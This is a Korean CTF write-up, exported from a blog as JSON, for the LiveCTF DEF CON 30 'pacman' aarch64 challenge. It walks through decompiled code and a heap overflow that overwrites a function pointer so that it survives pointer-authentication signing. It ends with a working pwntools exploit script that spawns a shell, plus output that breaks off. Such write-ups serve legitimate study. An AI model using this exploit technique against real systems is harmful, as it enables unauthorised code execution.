{"id":3400,"date":"2025-04-30T06:01:42","date_gmt":"2025-04-29T21:01:42","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3400"},"modified":"2025-04-30T06:01:44","modified_gmt":"2025-04-29T21:01:44","slug":"livectf-defcon30-pacman","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3400","title":{"rendered":"[LiveCTF-DEFCON30] pacman"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">\ucd9c\ucc98<\/h3>\n\n\n\n<p><a href=\"https:\/\/github.com\/Live-CTF\/LiveCTF-DEFCON30\/releases\/tag\/defcon30\">https:\/\/github.com\/Live-CTF\/LiveCTF-DEFCON30\/releases\/tag\/defcon30<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">checksec<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[*] '\/home\/ubuntu\/LiveCTF30\/handout\/pacman'\n    Arch:       aarch64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    Stripped:   No\n    Debuginfo:  Yes\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\uc900\ube44<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>qemu-user \uc124\uce58 \ud544\uc694.<\/li>\n\n\n\n<li>lib \ub514\ub809\ud1a0\ub9ac\uc5d0 ld-linux-aarch64.so.1, libc.so.6 \ud30c\uc77c \ubcf5\ubd99.<\/li>\n\n\n\n<li>challenge \uc2a4\ud06c\ub9bd\ud2b8, \uc544\ub798\uc640 \uac19\uc774 \uc218\uc815.<\/li>\n<\/ol>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"bash\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/bin\/sh\n\n# Requires (for ubuntu 22.04): qemu-user libc6-arm64-cross\n\nBIN=${1:-.\/pacman}\nexec qemu-aarch64 -cpu max -L .\/ ${BIN}<\/pre>\n\n\n\n<p>4. 
IDA Pro\uc5d0\uc11c \ubd84\uc11d\uc2dc <code>\u201cPACDZA X0\u201d<\/code> \uc640 \uac19\uc774 PAC\uac00 \uc874\uc7ac\ud558\ubbc0\ub85c,<br>Hex-Rays Decompiler Options \u2192 Analysis Options 2\uc5d0\uc11c \u201cShow ARMv8.3 PAC instructions\u201d \uccb4\ud06c \ud65c\uc131\ud654.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Decompiled-src \/ Analysis<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">main<\/h3>\n\n\n\n<p>0, 1, 2 \uc774\uc678\uc758 \ub2e4\ub978 \uba54\ub274 \uc785\ub825\uc2dc <code>\"Invalid choice\"<\/code> \ubb38\uad6c \ub744\uc6b0\uba74\uc11c \ub2e4\uc2dc \uba54\ub274 \uc785\ub825\ubc1b\uc74c.<\/p>\n\n\n\n<p>0 \u2192 <code>exit(0)<\/code> <br>1 \u2192 <code>build_package()<\/code> <br>2 \u2192 <code>install_package()<\/code><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall __noreturn main(int argc, const char **argv, const char **envp)\n{\n  char choice[8]; \/\/ [xsp+10h] [xbp+10h] BYREF\n\n  init();\n  puts(\"This is PACman v0.1\");\n  puts(byte_401E00);\n  while ( 1 )\n  {\n    puts(\"What do you want to do?\");\n    puts(byte_401E00);\n    puts(\"0) Exit\");\n    puts(\"1) Build package\");\n    puts(\"2) Install package\");\n    printf(\"? 
\");\n    strcpy(choice, \"0\");\n    read(0, choice, 2u);\n    if ( choice[0] == '2' )\n    {\n      install_package();\n    }\n    else\n    {\n      if ( (unsigned __int8)choice[0] &lt;= (unsigned int)'2' )\n      {\n        if ( choice[0] == '1' )\n        {\n          build_package();\n          goto LABEL_12;\n        }\n        if ( (unsigned __int8)choice[0] &lt;= (unsigned int)'1' &amp;&amp; (choice[0] == '\\n' || choice[0] == '0') )\n          exit(0);\n      }\n      puts(\"Invalid choice\");\n    }\nLABEL_12:\n    puts(byte_401E00);\n  }\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">build_package<\/h3>\n\n\n\n<p>\uba3c\uc800 \u201c? \u201c \ubb38\uad6c\ub97c \ub744\uc6b0\uba74\uc11c \uba54\ub274 0, 1, 2 \uc911\uc5d0 \ubb50 \uc120\ud0dd\ud560\uc9c0 \ubb3c\uc74c.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void __cdecl build_package()\n{\n  object_type v0; \/\/ w0\n  bool end; \/\/ [xsp+17h] [xbp+17h]\n  char *type; \/\/ [xsp+18h] [xbp+18h] BYREF\n  char *path; \/\/ [xsp+20h] [xbp+20h] BYREF\n  char *data; \/\/ [xsp+28h] [xbp+28h] BYREF\n  package_object *head; \/\/ [xsp+30h] [xbp+30h]\n  package_object *cur; \/\/ [xsp+38h] [xbp+38h]\n  package_object *o; \/\/ [xsp+40h] [xbp+40h]\n  size_t type_len; \/\/ [xsp+48h] [xbp+48h]\n  size_t data_len_0; \/\/ [xsp+50h] [xbp+50h]\n  void *p_0; \/\/ [xsp+58h] [xbp+58h]\n  size_t path_len; \/\/ [xsp+60h] [xbp+60h]\n  size_t data_len; \/\/ [xsp+68h] [xbp+68h]\n  void *p; \/\/ [xsp+70h] [xbp+70h]\n  void *p_1; \/\/ [xsp+78h] [xbp+78h]\n  void *p_2; \/\/ [xsp+80h] [xbp+80h]\n\n  head = 0;\n  cur = 0;\n  end = 0;\n  while ( !end )\n  {\n    puts(\"Object type:\");\n    puts(\"0 = EOF\");\n    puts(\"1 = File\");\n    puts(\"2 = Run Script\");\n    o = (package_object *)calloc(1u, 0x1030u);\n    if ( !o )\n      
err(1, \"malloc(package_object)\");\n    type = 0;\n    type_len = getinput(\"? \", &amp;type);\n    if ( !type || strlen(type) != 1 )\n      fprintf(stderr, \"Invalid object type input %s\\n\", type);\n    o->type = (unsigned __int8)*type;\n    v0 = o->type;\n    if ( v0 == object_type::Script )\n    {\n      data = 0;\n      data_len_0 = getinput(\"Script? \", &amp;data);\n      o->handler = (void (*)(void *))script_handler;\n      o->file.data = data;\n      p_0 = o->file.data;\n      p_0 = ptrauth_sign_unauthenticated(p_0, ptrauth_key_asda, 0);\n      o->file.data = (char *)p_0;\n    }\n    else\n    {\n      if ( (unsigned int)v0 > object_type::Script )\n        goto LABEL_15;\n      if ( v0 == object_type::End )\n      {\n        end = 1;\n      }\n      else\n      {\n        if ( v0 != object_type::File )\n        {\nLABEL_15:\n          fprintf(stderr, \"Bad object type int = %d\\n\", o->type);\n          exit(1);\n        }\n        path = 0;\n        path_len = getinput(\"Path? \", &amp;path);\n        data = 0;\n        data_len = getinput(\"Data? 
\", &amp;data);\n        o->handler = (void (*)(void *))file_handler;\n        o->file.data = data;\n        o->file.data_len = data_len;\n        memcpy(&amp;o->script + 2, path, path_len);\n        o->file.path_len = path_len;\n        p = o->file.data;\n        p = ptrauth_sign_unauthenticated(p, ptrauth_key_asda, 0);\n        o->file.data = (char *)p;\n      }\n    }\n    p_1 = o->handler;\n    p_1 = ptrauth_sign_unauthenticated(p_1, ptrauth_key_asda, 0);\n    o->handler = (void (*)(void *))p_1;\n    if ( head )\n    {\n      cur->next = o;\n      p_2 = cur->next;\n      p_2 = ptrauth_sign_unauthenticated(p_2, ptrauth_key_asda, 0);\n      cur->next = (package_object *)p_2;\n    }\n    else\n    {\n      head = o;\n    }\n    cur = o;\n  }\n  printf(\"Package blob: \");\n  write_package_blob(1, head);\n}<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void __cdecl file_handler(package_file *file)\n{\n  __int64 v1; \/\/ kr00_8\n  int fd; \/\/ [xsp+24h] [xbp+24h]\n\n  fd = open(file->path, 0x41, 0644);            \/\/ 0x41 = O_WRONLY | O_CREAT;\n  if ( fd &lt; 0 )\n    err(1, \"open(file)\");\n  v1 = 0;\n  file->data = (char *)ptrauth_auth_data(file->data, ptrauth_key_asda, &amp;v1);\n  write(fd, file->data, file->data_len);\n  close(fd);\n}<\/pre>\n\n\n\n<p>0\uc740 <code>object_type::End<\/code>, <code>end<\/code> \ubcc0\uc218\uac00 1\ub85c set\ub418\uc5b4 <code>while(!end)<\/code> \ub8e8\ud504\ubb38\uc744 \ube60\uc838\ub098\uac10.<\/p>\n\n\n\n<p>Data\ub97c A 8\uac1c, Path\ub97c B 8\uac1c\ub85c \ud588\uc744\uc2dc,<\/p>\n\n\n\n<p><code>Package blob: 10000008AAAAAAAA0000008BBBBBBBB20000008AAAAAAAA10000008AAAAAAAA0000008BBBBBBBB0<\/code><\/p>\n\n\n\n<p>\uc704\uc640 \uac19\uc774 Package blob\uc774 \ucd9c\ub825\ub41c\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" 
data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">...\nif ( v0 == object_type::End )\n{\n  end = 1;\n}\n...\nprintf(\"Package blob: \");\nwrite_package_blob(1, head);<\/pre>\n\n\n\n<p>1\uc740 <code>object_type::File<\/code>, <code>Path<\/code>\uc640 <code>Data<\/code>\ub97c \ud568\uaed8 \uc785\ub825\ubc1b\uc744 \uc218 \uc788\uc74c.<br>\uc5ec\uae30\uc11c <code>Path<\/code> \uae38\uc774\uc5d0 \ub530\ub77c <code>memcpy<\/code>\uc5d0 \uc758\ud574 bof \ucde8\uc57d\uc810 \ubc1c\uc0dd \uac00\ub2a5.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">o = (package_object *)calloc(1u, 4144u);\n...\nif ( v0 != object_type::File )\n{\n  fprintf(stderr, \"Bad object type int = %d\\n\", o->type);\n  exit(1);\n}\npath = 0;\npath_len = getinput(\"Path? \", &amp;path);\ndata = 0;\ndata_len = getinput(\"Data? 
\", &amp;data);\no->handler = (void (*)(void *))file_handler;\no->file.data = data;\no->file.data_len = data_len;\nmemcpy(&amp;o->script + 2, path, path_len);\no->file.path_len = path_len;\np = o->file.data;\np = ptrauth_sign_unauthenticated(p, ptrauth_key_asda, 0);\no->file.data = (char *)p;\n...<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">size_t __cdecl getinput(const char *prompt, char **buf)\n{\n  size_t len; \/\/ [xsp+20h] [xbp+20h] BYREF\n\n  printf(\"%s\", prompt);\n  len = 0;\n  len = getline(buf, &amp;len, stdin);\n  if ( (*buf)[len - 1] == 10 )\n    (*buf)[--len] = 0;\n  return len;\n}<\/pre>\n\n\n\n<p><code>calloc(1u, 4144u)<\/code>\uc5d0 \uc758\ud574 \ud560\ub2f9\ub41c \uc8fc\uc18c = <code>0x4142A0<\/code>.<\/p>\n\n\n\n<p><code>Path? AAAAAAAA<\/code><br><code>Data? BBBBBBBB<\/code> \ub85c \uc785\ub825\ud558\uace0 <code>memcpy(&amp;o->script + 2, path, path_len);<\/code>\ud560 \ub54c\ub97c \uc0b4\ud3b4\ubcf4\uba74,<br><code>x0<\/code> \ub808\uc9c0\uc2a4\ud130\ub294 <code>0x4142C0<\/code> \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a8\ub2e4, \uc989 \ud560\ub2f9\ub41c \uc8fc\uc18c <code>+ 0x20<\/code>\uc774\ub2e4.<\/p>\n\n\n\n<p>\uc5ec\uae30\uc11c <code>0x4152C8 - 0x4142C0 = 0x1008<\/code> ,<br><code>0x1008<\/code>\ub9cc\ud07c \ub354\ubbf8\ub97c \ucc44\uc6cc\uc11c <code>file_handler<\/code> \ud568\uc218\ub97c \ub36e\uc5b4\uc4f8 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">MEMORY:00000000004142A0 DCQ 0                                   ; next\nMEMORY:00000000004142A8 DCD object_type::File                   ; type\nMEMORY:00000000004142AC 
DCB 0, 0, 0, 0\nMEMORY:00000000004142B0 DCQ aBbbbbbbb                           ; file.data ; \"BBBBBBBB\"\nMEMORY:00000000004142B8 DCQ 8                                   ; file.data_len\nMEMORY:00000000004142C0 DCB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; file.path\n...\nMEMORY:00000000004152B6 DCB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0\nMEMORY:00000000004152C8 DCQ file_handler                        ; handler<\/pre>\n\n\n\n<p>2\ub294 <code>object_type::Script<\/code>, <code>Script?<\/code> \ubb38\uad6c\uc640 \ud568\uaed8 data\ub97c \uc785\ub825\ubc1b\uc74c.<br>\uc774\ubbf8 1\ubc88 \uba54\ub274\uc5d0\uc11c Path\uc640 Data \ud568\uaed8 \uc785\ub825\ubc1b\uae30\uc5d0, \ud544\uc694\uc5c6\uc74c.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">if ( v0 == object_type::Script )\n{\n  data = 0;\n  data_len_0 = getinput(\"Script? 
\", &amp;data);\n  o->handler = (void (*)(void *))script_handler;\n  o->file.data = data;\n  p_0 = o->file.data;\n  p_0 = ptrauth_sign_unauthenticated(p_0, ptrauth_key_asda, 0);\n  o->file.data = (char *)p_0;\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">install_package<\/h3>\n\n\n\n<p><code>parse_package_blob<\/code>\ub97c \ud638\ucd9c\ud558\uc5ec \ud30c\uc2f1\ub41c <code>type<\/code>\uc5d0 \ub530\ub77c<br><code>handler<\/code>\uc5d0 \uc800\uc7a5\ub41c \ud568\uc218\uac00 \ud638\ucd9c\ub420\uc9c0 \uc548\ub420\uc9c0 \uc5ec\ubd80\ub97c \uacb0\uc815\ud55c\ub2e4.<\/p>\n\n\n\n<p>\ub9cc\uc57d <code>type<\/code>\uc774 1 \ub610\ub294 2\ub77c\uba74, <code>handler<\/code>\uc5d0 \uc800\uc7a5\ub41c \ud568\uc218\uac00 \ud638\ucd9c\ub41c\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void __cdecl install_package()\n{\n  __int64 v0; \/\/ kr00_8\n  unsigned int type; \/\/ w0\n  __int64 v2; \/\/ kr08_8\n  package_object *cur; \/\/ [xsp+18h] [xbp+18h]\n\n  for ( cur = parse_package_blob(0); cur; cur = cur->next )\n  {\n    v0 = 0;\n    cur->handler = (void (*)(void *))ptrauth_auth_data(cur->handler, ptrauth_key_asda, &amp;v0);\n    printf(\"Evaluating object of type %c...\\n\", (unsigned int)cur->type);\n    type = cur->type;\n    if ( type != '2' )\n    {\n      if ( type > '2' )\n        goto LABEL_10;\n      if ( type == '0' )\n        exit(0);\n      if ( type != '1' )\n      {\nLABEL_10:\n        fprintf(stderr, \"Corrupt object type int = %d\\n\", cur->type);\n        exit(1);\n      }\n    }\n    cur->handler(&amp;cur->file);\n    v2 = 0;\n    cur->next = (package_object *)ptrauth_auth_data(cur->next, ptrauth_key_asda, &amp;v2);\n  }\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">parse_package_blob<\/h3>\n\n\n\n<p>\uc785\ub825\ub41c <code>blob<\/code>\uc5d0 
\ub530\ub77c <code>package_object<\/code>\ub97c \ud560\ub2f9\ud558\uace0 <code>type<\/code>\uc5d0 \ub530\ub77c \ud30c\uc2f1\uc5ed\ud560\uc744 \ud55c\ub2e4.<\/p>\n\n\n\n<p>\uac01 \ud0c0\uc785\ub4e4\uc740 build_package \ub0b4\uc5d0 \uc4f0\uc778 type\uc5d0 \ub530\ub77c \uc791\ub3d9\ud55c\ub2e4\uace0 \ubcf4\uba74 \ub428.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">package_object *__cdecl parse_package_blob(int fd)\n{\n  unsigned int type; \/\/ w0\n  bool end; \/\/ [xsp+2Fh] [xbp+2Fh]\n  package_object *head; \/\/ [xsp+30h] [xbp+30h]\n  package_object *cur; \/\/ [xsp+38h] [xbp+38h]\n  package_object *o; \/\/ [xsp+40h] [xbp+40h]\n  size_t data_len_0; \/\/ [xsp+48h] [xbp+48h]\n  char *data_0; \/\/ [xsp+50h] [xbp+50h]\n  size_t path_len; \/\/ [xsp+68h] [xbp+68h]\n  char *path; \/\/ [xsp+70h] [xbp+70h]\n  size_t data_len; \/\/ [xsp+78h] [xbp+78h]\n  char *data; \/\/ [xsp+80h] [xbp+80h]\n\n  head = 0;\n  cur = 0;\n  end = 0;\n  while ( !end )\n  {\n    o = (package_object *)calloc(1u, 4144u);\n    if ( !o )\n      err(1, \"malloc(package_object)\");\n    read_exactly(fd, &amp;o->type, 1u);\n    printf(\"Parsing object of type %c\\n\", (unsigned int)o->type);\n    type = o->type;\n    if ( type == '2' )\n    {\n      if ( is_running_safe() )\n      {\n        fwrite(\"Scripts not allowed unless PACMAN_UNSAFE=1\\n\", 1u, 0x2Bu, stderr);\n        exit(1);\n      }\n      data_len_0 = read_size_field(fd);\n      data_0 = (char *)malloc(data_len_0);\n      if ( !data_0 )\n        err(1, \"malloc(data)\");\n      read_exactly(fd, data_0, data_len_0);\n      o->handler = (void (*)(void *))script_handler;\n      o->handler = (void (*)(void *))ptrauth_sign_unauthenticated(o->handler, ptrauth_key_asda, 0);\n      o->file.data = data_0;\n      o->file.data = (char 
*)ptrauth_sign_unauthenticated(o->file.data, ptrauth_key_asda, 0);\n    }\n    else\n    {\n      if ( type > '2' )\n        goto LABEL_23;\n      if ( type == '0' )\n      {\n        end = 1;\n      }\n      else\n      {\n        if ( type != '1' )\n        {\nLABEL_23:\n          fprintf(stderr, \"Bad object type int = %d\\n\", o->type);\n          exit(1);\n        }\n        path_len = read_size_field(fd);\n        path = (char *)malloc(path_len);\n        if ( !path )\n          err(1, \"malloc(path)\");\n        read_exactly(fd, path, path_len);\n        if ( is_running_safe() &amp;&amp; strchr(path, '\/') )\n        {\n          fwrite(\"Subdirectories not allowed in safe mode\\n\", 1u, 0x28u, stderr);\n          exit(1);\n        }\n        data_len = read_size_field(fd);\n        data = (char *)malloc(data_len);\n        if ( !data )\n          err(1, \"malloc(data)\");\n        read_exactly(fd, data, data_len);\n        o->handler = (void (*)(void *))file_handler;\n        o->handler = (void (*)(void *))ptrauth_sign_unauthenticated(o->handler, ptrauth_key_asda, 0);\n        o->file.data = data;\n        o->file.data_len = data_len;\n        memcpy(&amp;o->script + 2, path, path_len);\n        o->file.path_len = path_len;\n        o->file.data = (char *)ptrauth_sign_unauthenticated(o->file.data, ptrauth_key_asda, 0);\n      }\n    }\n    if ( head )\n    {\n      cur->next = o;\n      cur->next = (package_object *)ptrauth_sign_unauthenticated(cur->next, ptrauth_key_asda, 0);\n    }\n    else\n    {\n      head = o;\n    }\n    cur = o;\n  }\n  return head;\n}<\/pre>\n\n\n\n<p>\ud658\uacbd\ubcc0\uc218\uac00 \uc9c0\uc815\uc548\ub418\uc788\uace0, \u201c\/\u201d \ud544\ud130\ub9c1 \ucc98\ub9ac\uac00 \ub418\uc788\uae30\uc5d0<br><code>Path<\/code>\ub97c \uc784\uc758\ub85c \uc9c0\uc815\ud574\uc11c flag\ub97c \uc77d\uc5b4\ub0bc \uc21c \uc5c6\uc744 \uac83\uc774\ub2e4..<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" 
data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">if ( is_running_safe() &amp;&amp; strchr(path, '\/') )\n{\n  fwrite(\"Subdirectories not allowed in safe mode\\n\", 1u, 0x28u, stderr);\n  exit(1);\n}<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">bool __cdecl is_running_safe()\n{\n  char *unsafe; \/\/ [xsp+18h] [xbp+18h]\n\n  unsafe = getenv(\"PACMAN_UNSAFE\");\n  return !unsafe || *unsafe == a1[0];\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py<\/h3>\n\n\n\n<p><code>Path<\/code>\ub294 0x1008\ubc14\uc774\ud2b8\ub9cc\ud07c \ub354\ubbf8\ub85c \ucc44\uc6b0\uace0, <code>script_handler<\/code> \ud568\uc218\uac00 \uc2e4\ud589\ub418\ub3c4\ub85d <code>handler<\/code>\ub97c \ub36e\uc5b4\uc4f4\ub2e4.<br>build_package\uc5d0\uc11c\ub294 memcpy \uc774\ud6c4\uc5d0 <code>handler<\/code>\uac00 <code>ptrauth_sign_unauthenticated<\/code>\ub85c \uc11c\uba85\ub418\ubbc0\ub85c, \ub36e\uc5b4\uc4f4 \uac12\ub3c4 \uc720\ud6a8\ud558\uac8c \uc11c\uba85\ub418\uc5b4 <code>install_package<\/code>\uc758 <code>ptrauth_auth_data<\/code> \uac80\uc99d\uc744 \ud1b5\uacfc\ud55c\ub2e4.<br><code>Data<\/code>\ub294 <code>\u201csh\u201d<\/code> \ubb38\uc790\uc5f4\ub85c \uc9c0\uc815\ud574\uc11c blob\ub97c \uc0dd\uc131\ud55c\ub2e4. 
(heap overflow)<\/p>\n\n\n\n<p>\uc774\ud6c4\uc5d0 <code>install_package<\/code> \ud568\uc218\ub97c \ud1b5\ud574 \uc0dd\uc131\ub41c blob\uc744 \ub123\uac8c \ub418\uba74,<br>cur->handler(&amp;cur->file); \ucf54\ub4dc\uc5d0\uc11c script_handler\uac00 \ud638\ucd9c\ub418\uba74\uc11c Data\uc778 script->script\uac00 \uc778\uc790\ub85c, system\uc774 \ud638\ucd9c\ub418\uba74\uc11c \uc258\uc744 \ub538 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\n# p = remote(\"127.0.0.1\", 1337)\np = process(\".\/challenge\")\ne = ELF('.\/pacman',checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\n# build package\nsla(b'? ', b'1')\n\n# object_type::File\nsla(b'? ', b'1')\nsla(b'Path? ', b'A'*0x1008 + p64(e.symbols['script_handler']))\nsla(b'Data? ', b'sh')\n\n# object_type::End\nsla(b'? ', b'0')\n\n# get blob\nru(b'blob: ')\nblob = ru(b'\\nWhat')[:-5]\nsuccess(f\"blob: {blob}\")\n\n# install_package with blob\nsla(b'? 
', b'2')\nsl(blob)\n\np.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@2d0f4d9a440c:~\/LiveCTF30\/handout$ python3 solve.py\n[+] Starting local process '.\/challenge': pid 1112\n[+] blob: b'10004112AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
